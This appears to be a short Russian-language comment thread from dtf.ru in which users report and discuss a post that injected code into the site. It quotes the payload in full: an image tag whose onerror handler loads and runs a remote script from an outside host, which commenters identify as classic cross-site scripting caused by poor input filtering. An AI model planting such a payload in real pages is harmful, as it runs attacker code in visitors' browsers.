Появился пост — dtf.ru/u/1853450-leonid-cunnywsky — на арабском, в котором через цитату вставлен код<img style="height:0; \*روثدمفشن:ذصينفوكخلأأختفشغصعيصطفأكأأدر*\; " src="روثدمفشنذصينفوكخلأأختفشغصعيصطفأكأأدرروثدمفشنذصينفوكخلأأختفشغصعيصطفأكأأدرروثدمفشنذصينفوكخلأأختفشغصعيصطفأكأأدرروثدمفشنذصينفوكخلأأختفشغصعيصطفأكأأدر" onerror="(u=>{let s=document.createElement('script');s.src=u;document.body.appendChild(s)})('https://worst.su/dtf/misaka10032.js')">Скрин — ```https://i.imgur.com/OJ7wRi1.jpeg```Скрин — https://i.imgur.com/OJ7wRi1.jpeg
так вот что это было?! НО КАК??
Буквально в посте объясняется
Недостаточная фильтрация входящих данных. Классический межсайтовый скриптинг
@Шериф @Тегайте отдельных модераторов
@Филипп Концаренко